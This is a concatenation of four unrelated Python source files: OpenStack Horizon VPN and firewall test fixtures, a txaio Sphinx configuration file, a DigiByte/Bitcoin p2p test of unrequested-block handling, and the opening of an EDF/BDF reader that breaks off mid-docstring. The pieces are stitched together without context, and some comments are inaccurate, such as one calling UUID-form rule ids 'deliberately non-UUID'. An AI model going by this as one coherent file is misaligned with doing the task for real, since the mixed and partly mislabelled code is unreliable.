    vpnservice_dict = {'id': '09a26949-6231-4f72-942a-0c8c0ddd4d61',
                       'tenant_id': '1',
                       'name': 'cloud_vpn1',
                       'description': 'vpn description',
                       'subnet_id': TEST.subnets.first().id,
                       'router_id': TEST.routers.first().id,
                       'vpn_type': 'ipsec',
                       'ipsecsiteconnections': [],
                       'admin_state_up': True,
                       'status': 'Active'}
    TEST.api_vpnservices.add(vpnservice_dict)
    TEST.vpnservices.add(vpn.VPNService(vpnservice_dict))

    # 2nd VPNService
    vpnservice_dict = {'id': '09a26949-6231-4f72-942a-0c8c0ddd4d62',
                       'tenant_id': '1',
                       'name': 'cloud_vpn2',
                       'description': 'vpn description',
                       'subnet_id': TEST.subnets.first().id,
                       'router_id': TEST.routers.first().id,
                       'vpn_type': 'ipsec',
                       'ipsecsiteconnections': [],
                       'admin_state_up': True,
                       'status': 'Active'}
    TEST.api_vpnservices.add(vpnservice_dict)
    TEST.vpnservices.add(vpn.VPNService(vpnservice_dict))

    # 1st IKEPolicy
    ikepolicy_dict = {'id': 'a1f009b7-0ffa-43a7-ba19-dcabb0b4c981',
                      'tenant_id': '1',
                      'name': 'ikepolicy_1',
                      'description': 'ikepolicy description',
                      'auth_algorithm': 'sha1',
                      'encryption_algorithm': 'aes-256',
                      'ike_version': 'v1',
                      'lifetime': {'units': 'seconds', 'value': 3600},
                      'phase1_negotiation_mode': 'main',
                      'pfs': 'group5'}
    TEST.api_ikepolicies.add(ikepolicy_dict)
    TEST.ikepolicies.add(vpn.IKEPolicy(ikepolicy_dict))

    # 2nd IKEPolicy
    ikepolicy_dict = {'id': 'a1f009b7-0ffa-43a7-ba19-dcabb0b4c982',
                      'tenant_id': '1',
                      'name': 'ikepolicy_2',
                      'description': 'ikepolicy description',
                      'auth_algorithm': 'sha1',
                      'encryption_algorithm': 'aes-256',
                      'ike_version': 'v1',
                      'lifetime': {'units': 'seconds', 'value': 3600},
                      'phase1_negotiation_mode': 'main',
                      'pfs': 'group5'}
    TEST.api_ikepolicies.add(ikepolicy_dict)
    TEST.ikepolicies.add(vpn.IKEPolicy(ikepolicy_dict))

    # 1st IPSecPolicy
    ipsecpolicy_dict = {'id': '8376e1dd-2b1c-4346-b23c-6989e75ecdb8',
                        'tenant_id': '1',
                        'name': 'ipsecpolicy_1',
                        'description': 'ipsecpolicy description',
                        'auth_algorithm': 'sha1',
                        'encapsulation_mode': 'tunnel',
                        'encryption_algorithm': '3des',
                        'lifetime': {'units': 'seconds', 'value': 3600},
                        'pfs': 'group5',
                        'transform_protocol': 'esp'}
    TEST.api_ipsecpolicies.add(ipsecpolicy_dict)
    TEST.ipsecpolicies.add(vpn.IPSecPolicy(ipsecpolicy_dict))

    # 2nd IPSecPolicy
    ipsecpolicy_dict = {'id': '8376e1dd-2b1c-4346-b23c-6989e75ecdb9',
                        'tenant_id': '1',
                        'name': 'ipsecpolicy_2',
                        'description': 'ipsecpolicy description',
                        'auth_algorithm': 'sha1',
                        'encapsulation_mode': 'tunnel',
                        'encryption_algorithm': '3des',
                        'lifetime': {'units': 'seconds', 'value': 3600},
                        'pfs': 'group5',
                        'transform_protocol': 'esp'}
    TEST.api_ipsecpolicies.add(ipsecpolicy_dict)
    TEST.ipsecpolicies.add(vpn.IPSecPolicy(ipsecpolicy_dict))

    # 1st IPSecSiteConnection (IPv6 peer)
    ipsecsiteconnection_dict = {'id': 'dd1dd3a0-f349-49be-b013-245e147763d6',
                                'tenant_id': '1',
                                'name': 'ipsec_connection_1',
                                'description': 'vpn connection description',
                                'dpd': {'action': 'hold',
                                        'interval': 30,
                                        'timeout': 120},
                                'ikepolicy_id': ikepolicy_dict['id'],
                                'initiator': 'bi-directional',
                                'ipsecpolicy_id': ipsecpolicy_dict['id'],
                                'mtu': '1500',
                                'peer_address':
                                '2607:f0d0:4545:3:200:f8ff:fe21:67cf',
                                'peer_cidrs': '20.1.0.0/24',
                                'peer_id':
                                '2607:f0d0:4545:3:200:f8ff:fe21:67cf',
                                'psk': 'secret',
                                'vpnservice_id': vpnservice_dict['id'],
                                'admin_state_up': True,
                                'status': 'Active'}
    TEST.api_ipsecsiteconnections.add(ipsecsiteconnection_dict)
    TEST.ipsecsiteconnections.add(
        vpn.IPSecSiteConnection(ipsecsiteconnection_dict))

    # 2nd IPSecSiteConnection (IPv4 peer)
    ipsecsiteconnection_dict = {'id': 'dd1dd3a0-f349-49be-b013-245e147763d7',
                                'tenant_id': '1',
                                'name': 'ipsec_connection_2',
                                'description': 'vpn connection description',
                                'dpd': {'action': 'hold',
                                        'interval': 30,
                                        'timeout': 120},
                                'ikepolicy_id': ikepolicy_dict['id'],
                                'initiator': 'bi-directional',
                                'ipsecpolicy_id': ipsecpolicy_dict['id'],
                                'mtu': '1500',
                                'peer_address': '172.0.0.2',
                                'peer_cidrs': '20.1.0.0/24',
                                'peer_id': '172.0.0.2',
                                'psk': 'secret',
                                'vpnservice_id': vpnservice_dict['id'],
                                'admin_state_up': True,
                                'status': 'Active'}
    TEST.api_ipsecsiteconnections.add(ipsecsiteconnection_dict)
    TEST.ipsecsiteconnections.add(
        vpn.IPSecSiteConnection(ipsecsiteconnection_dict))

    #------------------------------------------------------------
    # FWaaS

    # 1st rule (deliberately non-UUID ids below keep the three rules
    # distinguishable in test output)
    rule1_dict = {'id': 'f0881d38-c3eb-4fee-9763-12de3338041d',
                  'tenant_id': '1',
                  'name': 'rule1',
                  'description': 'rule1 description',
                  'protocol': 'tcp',
                  'action': 'allow',
                  'source_ip_address': '1.2.3.0/24',
                  'source_port': '80',
                  'destination_ip_address': '4.5.6.7/32',
                  'destination_port': '1:65535',
                  'firewall_policy_id': 'abcdef-c3eb-4fee-9763-12de3338041e',
                  'position': 1,
                  'shared': True,
                  'enabled': True}
    TEST.api_fw_rules.add(rule1_dict)
    TEST.fw_rules.add(fwaas.Rule(rule1_dict))

    # 2nd rule
    rule2_dict = {'id': 'g0881d38-c3eb-4fee-9763-12de3338041d',
                  'tenant_id': '1',
                  'name': 'rule2',
                  'description': 'rule2 description',
                  'protocol': 'udp',
                  'action': 'deny',
                  'source_ip_address': '1.2.3.0/24',
                  'source_port': '80',
                  'destination_ip_address': '4.5.6.7/32',
                  'destination_port': '1:65535',
                  'firewall_policy_id': 'abcdef-c3eb-4fee-9763-12de3338041e',
                  'position': 2,
                  'shared': True,
                  'enabled': True}
    TEST.api_fw_rules.add(rule2_dict)
    TEST.fw_rules.add(fwaas.Rule(rule2_dict))

    # 3rd rule (not bound to any policy)
    rule3_dict = {'id': 'h0881d38-c3eb-4fee-9763-12de3338041d',
                  'tenant_id': '1',
                  'name': 'rule3',
                  'description': 'rule3 description',
                  'protocol': 'icmp',
                  'action': 'allow',
                  'source_ip_address': '1.2.3.0/24',
                  'source_port': '80',
                  'destination_ip_address': '4.5.6.7/32',
                  'destination_port': '1:65535',
                  'firewall_policy_id': None,
                  'position': None,
                  'shared': True,
                  'enabled': True}
    TEST.api_fw_rules.add(rule3_dict)
    TEST.fw_rules.add(fwaas.Rule(rule3_dict))

    # 1st policy
    policy_dict = {'id': 'abcdef-c3eb-4fee-9763-12de3338041e',
                   'tenant_id': '1',
                   'name': 'policy1',
                   'description': 'policy description',
                   'firewall_rules': [rule1_dict['id'], rule2_dict['id']],
                   'audited': True,
                   'shared': True}
    TEST.api_fw_policies.add(policy_dict)
    TEST.fw_policies.add(fwaas.Policy(policy_dict))

    # 1st firewall
    firewall_dict = {'id': '8913dde8-4915-4b90-8d3e-b95eeedb0d49',
                     'tenant_id': '1',
                     'firewall_policy_id':
                         'abcdef-c3eb-4fee-9763-12de3338041e',
                     'name': 'firewall1',
                     'description': 'firewall description',
                     'status': 'PENDING_CREATE',
                     'shared': True,
                     'admin_state_up': True}
    TEST.api_firewalls.add(firewall_dict)
    TEST.firewalls.add(fwaas.Firewall(firewall_dict))
|
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
#
# txaio documentation build configuration file, created by
# sphinx-quickstart on Wed Mar 18 14:29:26 2015.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# Note that not all possible configuration values are present in this
# autogenerated file.
#
# All configuration values have a default; values that are commented out
# serve to show the default.
import sys
import os
import shlex
import time
# Optional extras: the RTD theme and the spelling checker may not be
# installed (e.g. on a minimal build host); fall back to None and let the
# configuration below adapt.
try:
    import sphinx_rtd_theme
except ImportError:
    sphinx_rtd_theme = None

try:
    from sphinxcontrib import spelling
except ImportError:
    spelling = None
# Monkey patch away WARNING like:
# "index.rst:4: WARNING: nonlocal image URI found: https://img.shields.io/pypi/v/txaio.svg"
# see: http://stackoverflow.com/a/28778969
import sphinx.environment
from docutils.utils import get_source_line
def _warn_node(self, msg, node, **kwargs):
    """Replacement for BuildEnvironment.warn_node that silences the noisy
    'nonlocal image URI found' warnings and forwards everything else."""
    if msg.startswith('nonlocal image URI found:'):
        return
    source, line = get_source_line(node)
    self._warnfunc(msg, '%s:%s' % (source, line))

# Install the filtering replacement on Sphinx's build environment.
sphinx.environment.BuildEnvironment.warn_node = _warn_node
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
sys.path.insert(0, os.path.abspath('..'))

# -- General configuration ------------------------------------------------

# If your documentation needs a minimal Sphinx version, state it here.
#needs_sphinx = '1.0'

# Check if we are building on readthedocs
# NOTE(review): RTD_BUILD is not referenced in this portion of the file --
# confirm it is used further down before removing.
RTD_BUILD = os.environ.get('READTHEDOCS', None) == 'True'

# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
    'sphinx.ext.autodoc',
    'sphinx.ext.viewcode',
    'sphinx.ext.intersphinx',
]

# extensions not available on RTD
if spelling is not None:
    extensions.append('sphinxcontrib.spelling')
    spelling_lang = 'en_US'
    spelling_show_suggestions = False
    spelling_word_list_filename = 'spelling_wordlist.txt'

# custom txaio extension configuration
autodoc_member_order = 'bysource'
autodoc_default_flags = ['members', 'show-inheritance', 'undoc-members']
autoclass_content = 'both'

# Add any paths that contain templates here, relative to this directory.
templates_path = ['_templates']

# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
# source_suffix = ['.rst', '.md']
source_suffix = '.rst'

# The encoding of source files.
#source_encoding = 'utf-8-sig'

# The master toctree document.
master_doc = 'contents'

# General information about the project.
project = 'txaio'
author = 'Crossbar.io Project'

# Keep the copyright year range current without manual edits.
this_year = '{0}'.format(time.strftime('%Y'))
if this_year != '2015':
    copyright = '2015-{0}, Crossbar.io Technologies GmbH'.format(this_year)
else:
    copyright = '2015, Crossbar.io Technologies GmbH'

# The version info for the project you're documenting, acts as replacement for
# |version| and |release|, also used in various other places throughout the
# built documents.
#
# Read the version from txaio/_version.py without importing the package.
base_dir = os.path.abspath(os.path.join(os.path.dirname(__file__), os.pardir))
with open(os.path.join(base_dir, "txaio", "_version.py")) as f:
    exec(f.read())  # defines __version__

version = release = __version__

# The language for content autogenerated by Sphinx. Refer to documentation
# for a list of supported languages.
#
# This is also used if you do content translation via gettext catalogs.
# Usually you set "language" from the command line for these cases.
language = 'en'

# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'

# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']

# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None

# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True

# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True

# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False

# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'

# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []

# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False

# If true, `todo` and `todoList` produce output, else they produce nothing.
todo_include_todos = False

# -- Options for HTML output ----------------------------------------------

# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes. Prefer the RTD theme when it is installed.
if sphinx_rtd_theme:
    html_theme = "sphinx_rtd_theme"
    html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]
else:
    html_theme = "default"

# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#html_theme_options = {}

# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []

# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None

# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None

# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None

# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None

# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = []
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
# Show full, global TOC in sidebar
# http://stackoverflow.com/a/19007358
# http://sphinx-doc.org/config.html#confval-html_sidebars
html_sidebars = {
'**': [
'globaltoc.html',
'relations.html',
'sourcelink.html',
'searchbox.html'
],
}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Language to be used for generating the HTML full-text search index.
# Sphinx supports the following languages:
# 'da', 'de', 'en', 'es', 'fi', 'fr', 'h', 'it', 'ja'
# 'nl', 'no', 'pt', 'ro', 'r', 'sv', 'tr'
#html_search_language = 'en'
# A dictionary with options for the search language support, empty by default.
# Now only 'ja' uses this config value
#html_search_options = {'type': 'default'}
# The name of a javascript file (relative to the configuration directory) that
# implements a search results scorer. If empty, the default will be used.
#html_search_scorer = 'scorer.js'
# Output file base name for HTML help builder.
htmlhelp_basename = 'txaiodoc'
# http://sphinx-doc.org/ext/intersphinx.html
intersphinx_mapping = {
'py2': ('https://docs.python.org/2', None),
'py3': ('https://docs.python.org/3', None),
'python': ('https://docs.python.org/3', None),
'rtd': ('https://docs.readthedocs.io/en/latest/', None),
'autobahn': ('https://autobahn.readthedocs.io/en/latest/', None),
'zlmdb': ('https://zlmdb.readthedocs.io/en/latest/', None),
}
|
|
#!/usr/bin/env python3
# Copyright (c) 2015-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
from test_framework.mininode import *
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
import time
from test_framework.blocktools import create_block, create_coinbase
'''
AcceptBlockTest -- test processing of unrequested blocks.
Since behavior differs when receiving unrequested blocks from whitelisted peers
versus non-whitelisted peers, this tests the behavior of both (effectively two
separate tests running in parallel).
Setup: two nodes, node0 and node1, not connected to each other. Node0 does not
whitelist localhost, but node1 does. They will each be on their own chain for
this test.
We have one NodeConn connection to each, test_node and white_node respectively.
The test:
1. Generate one block on each node, to leave IBD.
2. Mine a new block on each tip, and deliver to each node from node's peer.
The tip should advance.
3. Mine a block that forks the previous block, and deliver to each node from
corresponding peer.
Node0 should not process this block (just accept the header), because it is
unrequested and doesn't have more work than the tip.
Node1 should process because this is coming from a whitelisted peer.
4. Send another block that builds on the forking block.
Node0 should process this block but be stuck on the shorter chain, because
it's missing an intermediate block.
Node1 should reorg to this longer chain.
4b.Send 288 more blocks on the longer chain.
Node0 should process all but the last block (too far ahead in height).
Send all headers to Node1, and then send the last block in that chain.
Node1 should accept the block because it's coming from a whitelisted peer.
5. Send a duplicate of the block in #3 to Node0.
Node0 should not process the block because it is unrequested, and stay on
the shorter chain.
6. Send Node0 an inv for the height 3 block produced in #4 above.
Node0 should figure out that we have the missing height 2 block and send a
getdata.
7. Send Node0 the missing block again.
Node0 should process and the tip should advance.
'''
# TestNode: bare-bones "peer". Used mostly as a conduit for a test to send
# p2p messages to a node, generating the messages in the main testing logic.
class TestNode(NodeConnCB):
    """Minimal peer: forwards hand-built p2p messages to a node under test."""

    def __init__(self):
        NodeConnCB.__init__(self)
        self.connection = None
        self.ping_counter = 1
        self.last_pong = msg_pong()

    def add_connection(self, conn):
        # Remember the NodeConn so send_message() can forward through it.
        self.connection = conn

    def on_getdata(self, conn, message):
        # Keep the most recent getdata so the test can inspect it later.
        self.last_getdata = message

    def wait_for_verack(self):
        """Spin until the node's verack arrives (signals the test can begin).

        Called from the testing thread, so the global mininode lock must be
        taken around every read of shared connection state.
        """
        done = False
        while not done:
            with mininode_lock:
                done = self.verack_received
            if not done:
                time.sleep(0.05)

    def send_message(self, message):
        # Thin wrapper around the underlying NodeConn.
        self.connection.send_message(message)

    def on_pong(self, conn, message):
        self.last_pong = message

    def sync_with_ping(self, timeout=30):
        """Ping the node and poll until the matching pong comes back.

        Returns True when the pong with our nonce was seen, False on timeout.
        """
        self.connection.send_message(msg_ping(nonce=self.ping_counter))
        poll_interval = 0.05
        remaining = timeout
        synced = False
        while not synced and remaining > 0:
            time.sleep(poll_interval)
            remaining -= poll_interval
            with mininode_lock:
                synced = (self.last_pong.nonce == self.ping_counter)
        self.ping_counter += 1
        return synced
class AcceptBlockTest(BitcoinTestFramework):
    """Test processing of unrequested blocks (see module docstring for plan)."""

    def add_options(self, parser):
        parser.add_option("--testbinary", dest="testbinary",
                          default=os.getenv("DIGIBYTED", "digibyted"),
                          help="digibyted binary to test")

    def __init__(self):
        super().__init__()
        # Start from a fresh chain so block heights are deterministic.
        self.setup_clean_chain = True
        self.num_nodes = 2

    def setup_network(self):
        # Node0 will be used to test behavior of processing unrequested blocks
        # from peers which are not whitelisted, while Node1 will be used for
        # the whitelisted case.
        self.nodes = []
        self.nodes.append(start_node(0, self.options.tmpdir, ["-debug"],
                                     binary=self.options.testbinary))
        self.nodes.append(start_node(1, self.options.tmpdir,
                                     ["-debug", "-whitelist=127.0.0.1"],
                                     binary=self.options.testbinary))

    def run_test(self):
        """Drive the numbered scenario steps from the module docstring."""
        # Setup the p2p connections and start up the network thread.
        test_node = TestNode()   # connects to node0 (not whitelisted)
        white_node = TestNode()  # connects to node1 (whitelisted)
        connections = []
        connections.append(NodeConn('127.0.0.1', p2p_port(0),
                                    self.nodes[0], test_node))
        connections.append(NodeConn('127.0.0.1', p2p_port(1),
                                    self.nodes[1], white_node))
        test_node.add_connection(connections[0])
        white_node.add_connection(connections[1])
        NetworkThread().start()  # Start up network handling in another thread
        # Test logic begins here
        test_node.wait_for_verack()
        white_node.wait_for_verack()
        # 1. Have both nodes mine a block (leave IBD)
        [ n.generate(1) for n in self.nodes ]
        tips = [ int("0x" + n.getbestblockhash(), 0) for n in self.nodes ]
        # 2. Send one block that builds on each tip.
        # This should be accepted.
        blocks_h2 = []  # the height 2 blocks on each node's chain
        block_time = int(time.time()) + 1
        for i in range(2):
            blocks_h2.append(create_block(tips[i], create_coinbase(2),
                                          block_time))
            blocks_h2[i].solve()
            block_time += 1
        test_node.send_message(msg_block(blocks_h2[0]))
        white_node.send_message(msg_block(blocks_h2[1]))
        [ x.sync_with_ping() for x in [test_node, white_node] ]
        assert_equal(self.nodes[0].getblockcount(), 2)
        assert_equal(self.nodes[1].getblockcount(), 2)
        print("First height 2 block accepted by both nodes")
        # 3. Send another block that builds on the original tip.
        blocks_h2f = []  # Blocks at height 2 that fork off the main chain
        for i in range(2):
            blocks_h2f.append(create_block(tips[i], create_coinbase(2),
                                           blocks_h2[i].nTime+1))
            blocks_h2f[i].solve()
        test_node.send_message(msg_block(blocks_h2f[0]))
        white_node.send_message(msg_block(blocks_h2f[1]))
        [ x.sync_with_ping() for x in [test_node, white_node] ]
        # Non-whitelisted peer: only the header should have been accepted.
        for x in self.nodes[0].getchaintips():
            if x['hash'] == blocks_h2f[0].hash:
                assert_equal(x['status'], "headers-only")
        # Whitelisted peer: the block itself should have been processed.
        for x in self.nodes[1].getchaintips():
            if x['hash'] == blocks_h2f[1].hash:
                assert_equal(x['status'], "valid-headers")
        print("Second height 2 block accepted only from whitelisted peer")
        # 4. Now send another block that builds on the forking chain.
        blocks_h3 = []
        for i in range(2):
            blocks_h3.append(create_block(blocks_h2f[i].sha256,
                                          create_coinbase(3),
                                          blocks_h2f[i].nTime+1))
            blocks_h3[i].solve()
        test_node.send_message(msg_block(blocks_h3[0]))
        white_node.send_message(msg_block(blocks_h3[1]))
        [ x.sync_with_ping() for x in [test_node, white_node] ]
        # Since the earlier block was not processed by node0, the new block
        # can't be fully validated.
        for x in self.nodes[0].getchaintips():
            if x['hash'] == blocks_h3[0].hash:
                assert_equal(x['status'], "headers-only")
        # But this block should be accepted by node0 since it has more work.
        try:
            self.nodes[0].getblock(blocks_h3[0].hash)
            print("Unrequested more-work block accepted from non-whitelisted peer")
        except:
            raise AssertionError("Unrequested more work block was not processed")
        # Node1 should have accepted and reorged.
        assert_equal(self.nodes[1].getblockcount(), 3)
        print("Successfully reorged to length 3 chain from whitelisted peer")
        # 4b. Now mine 288 more blocks and deliver; all should be processed but
        # the last (height-too-high) on node0. Node1 should process the tip if
        # we give it the headers chain leading to the tip.
        tips = blocks_h3
        headers_message = msg_headers()
        all_blocks = []  # node0's blocks
        for j in range(2):
            for i in range(288):
                next_block = create_block(tips[j].sha256,
                                          create_coinbase(i + 4),
                                          tips[j].nTime+1)
                next_block.solve()
                if j == 0:
                    # node0 gets the full blocks as they are mined
                    test_node.send_message(msg_block(next_block))
                    all_blocks.append(next_block)
                else:
                    # node1 only gets the headers for now
                    headers_message.headers.append(CBlockHeader(next_block))
                tips[j] = next_block
        # Give node0 time to process the flood of blocks before checking.
        time.sleep(2)
        for x in all_blocks:
            try:
                self.nodes[0].getblock(x.hash)
                if x == all_blocks[287]:
                    raise AssertionError("Unrequested block too far-ahead should have been ignored")
            except:
                if x == all_blocks[287]:
                    print("Unrequested block too far-ahead not processed")
                else:
                    raise AssertionError("Unrequested block with more work should have been accepted")
        headers_message.headers.pop()  # Ensure the last block is unrequested
        white_node.send_message(headers_message)  # Send headers leading to tip
        white_node.send_message(msg_block(tips[1]))  # Now deliver the tip
        try:
            white_node.sync_with_ping()
            self.nodes[1].getblock(tips[1].hash)
            print("Unrequested block far ahead of tip accepted from whitelisted peer")
        except:
            raise AssertionError("Unrequested block from whitelisted peer not accepted")
        # 5. Test handling of unrequested block on the node that didn't process
        # Should still not be processed (even though it has a child that has more
        # work).
        test_node.send_message(msg_block(blocks_h2f[0]))
        # Here, if the sleep is too short, the test could falsely succeed (if the
        # node hasn't processed the block by the time the sleep returns, and then
        # the node processes it and incorrectly advances the tip).
        # But this would be caught later on, when we verify that an inv triggers
        # a getdata request for this block.
        test_node.sync_with_ping()
        assert_equal(self.nodes[0].getblockcount(), 2)
        print("Unrequested block that would complete more-work chain was ignored")
        # 6. Try to get node to request the missing block.
        # Poke the node with an inv for block at height 3 and see if that
        # triggers a getdata on block 2 (it should if block 2 is missing).
        with mininode_lock:
            # Clear state so we can check the getdata request
            test_node.last_getdata = None
        test_node.send_message(msg_inv([CInv(2, blocks_h3[0].sha256)]))
        test_node.sync_with_ping()
        with mininode_lock:
            getdata = test_node.last_getdata
        # Check that the getdata includes the right block
        assert_equal(getdata.inv[0].hash, blocks_h2f[0].sha256)
        print("Inv at tip triggered getdata for unprocessed block")
        # 7. Send the missing block for the third time (now it is requested)
        test_node.send_message(msg_block(blocks_h2f[0]))
        test_node.sync_with_ping()
        assert_equal(self.nodes[0].getblockcount(), 290)
        print("Successfully reorged to longer chain from non-whitelisted peer")
        [ c.disconnect_node() for c in connections ]
# Run the test directly when invoked as a script.
if __name__ == '__main__':
    AcceptBlockTest().main()
|
|
"""Conversion tool from EDF+,BDF to FIF
"""
# Authors: Teon Brooks <teon.brooks@gmail.com>
# Martin Billinger <martin.billinger@tugraz.at>
#
# License: BSD (3-clause)
import os
import calendar
import datetime
import re
import warnings
from math import ceil, floor
import numpy as np
from ...utils import verbose, logger
from ..base import _BaseRaw, _check_update_montage
from ..meas_info import _empty_info
from ..pick import pick_types
from ..constants import FIFF
from ...filter import resample
from ...externals.six.moves import zip
class RawEDF(_BaseRaw):
    """Raw object from EDF+,BDF file

    Parameters
    ----------
    input_fname : str
        Path to the EDF+,BDF file.
    montage : str | None | instance of Montage
        Path or instance of montage containing electrode positions.
        If None, sensor locations are (0,0,0).
    eog : list or tuple
        Names of channels or list of indices that should be designated
        EOG channels. Values should correspond to the electrodes in the
        edf file. Default is None.
    misc : list or tuple
        Names of channels or list of indices that should be designated
        MISC channels. Values should correspond to the electrodes in the
        edf file. Default is None.
    stim_channel : str | int | None
        The channel name or channel index (starting at 0).
        -1 corresponds to the last channel (default).
        If None, there will be no stim channel added.
    annot : str | None
        Path to annotation file.
        If None, no derived stim channel will be added (for files requiring
        annotation file to interpret stim channel).
    annotmap : str | None
        Path to annotation map file containing mapping from label to trigger.
        Must be specified if annot is not None.
    preload : bool or str (default False)
        Preload data into memory for data manipulation and faster indexing.
        If True, the data will be preloaded into memory (fast, requires
        large amount of memory). If preload is a string, preload is the
        file name of a memory-mapped file which is used to store the data
        on the hard drive (slower, requires less memory).
    verbose : bool, str, int, or None
        If not None, override default verbose level (see mne.verbose).

    See Also
    --------
    mne.io.Raw : Documentation of attribute and methods.
    """
    @verbose
    def __init__(self, input_fname, montage, eog=None, misc=None,
                 stim_channel=-1, annot=None, annotmap=None,
                 preload=False, verbose=None):
        logger.info('Extracting edf Parameters from %s...' % input_fname)
        input_fname = os.path.abspath(input_fname)
        # Parse the EDF/BDF header once; edf_info carries reader state
        # (sample counts, offsets, channel roles) used by _read_segment_file.
        info, edf_info = _get_edf_info(input_fname, stim_channel,
                                       annot, annotmap,
                                       eog, misc, preload)
        logger.info('Creating Raw.info structure...')
        _check_update_montage(info, montage)
        # annot and annotmap only make sense together.
        if bool(annot) != bool(annotmap):
            warnings.warn(("Stimulus Channel will not be annotated. "
                           "Both 'annot' and 'annotmap' must be specified."))
        # Raw attributes
        last_samps = [edf_info['nsamples'] - 1]
        super(RawEDF, self).__init__(
            info, preload, filenames=[input_fname], raw_extras=[edf_info],
            last_samps=last_samps, orig_format='int',
            verbose=verbose)
        logger.info('Ready.')

    @verbose
    def _read_segment_file(self, data, idx, offset, fi, start, stop,
                           cals, mult):
        """Read a chunk of raw data"""
        from scipy.interpolate import interp1d
        if mult is not None:
            # XXX "cals" here does not function the same way as in RawFIF,
            # and for efficiency we want to be able to combine mult and cals
            # so proj support will have to wait until this is resolved
            raise NotImplementedError('mult is not supported yet')
        # RawFIF and RawEDF think of "stop" differently, easiest to increment
        # here and refactor later
        stop += 1
        sel = np.arange(self.info['nchan'])[idx]
        n_samps = self._raw_extras[fi]['n_samps']
        buf_len = self._raw_extras[fi]['max_samp']
        sfreq = self.info['sfreq']
        n_chan = self.info['nchan']
        data_size = self._raw_extras[fi]['data_size']
        data_offset = self._raw_extras[fi]['data_offset']
        stim_channel = self._raw_extras[fi]['stim_channel']
        tal_channel = self._raw_extras[fi]['tal_channel']
        annot = self._raw_extras[fi]['annot']
        annotmap = self._raw_extras[fi]['annotmap']
        subtype = self._raw_extras[fi]['subtype']
        # this is used to deal with indexing in the middle of a sampling period
        blockstart = int(floor(float(start) / buf_len) * buf_len)
        blockstop = int(ceil(float(stop) / buf_len) * buf_len)
        # gain constructor
        physical_range = np.array([ch['range'] for ch in self.info['chs']])
        cal = np.array([ch['cal'] for ch in self.info['chs']])
        gains = np.atleast_2d(self._raw_extras[0]['units'] *
                              (physical_range / cal))
        # physical dimension in uV
        physical_min = self._raw_extras[fi]['physical_min'] * 1e-6
        digital_min = self._raw_extras[fi]['digital_min']
        offsets = np.atleast_2d(physical_min - (digital_min * gains)).T
        # stim/TAL channels carry raw codes, not physical values: no offset.
        # NOTE(review): if either channel is None this fancy index would
        # fail; presumably both are set whenever this path runs — confirm.
        picks = [stim_channel, tal_channel]
        offsets[picks] = 0
        read_size = blockstop - blockstart
        this_data = np.empty((len(sel), buf_len))
        data = data[:, offset:offset + (stop - start)]
        """
        Consider this example:
        tmin, tmax = (2, 27)
        read_size = 30
        buf_len = 10
        sfreq = 1.
                        +---------+---------+---------+
        File structure: |  buf0   |   buf1  |   buf2  |
                        +---------+---------+---------+
        File time:      0        10        20        30
                        +---------+---------+---------+
        Requested time:   2                       27
                        |                             |
                    blockstart                    blockstop
                          |                        |
                        start                    stop
        We need 27 - 2 = 25 samples (per channel) to store our data, and
        we need to read from 3 buffers (30 samples) to get all of our data.
        On all reads but the first, the data we read starts at
        the first sample of the buffer. On all reads but the last,
        the data we read ends on the last sample of the buffer.
        We call this_data the variable that stores the current buffer's data,
        and data the variable that stores the total output.
        On the first read, we need to do this::
            >>> data[0:buf_len-2] = this_data[2:buf_len]
        On the second read, we need to do::
            >>> data[1*buf_len-2:2*buf_len-2] = this_data[0:buf_len]
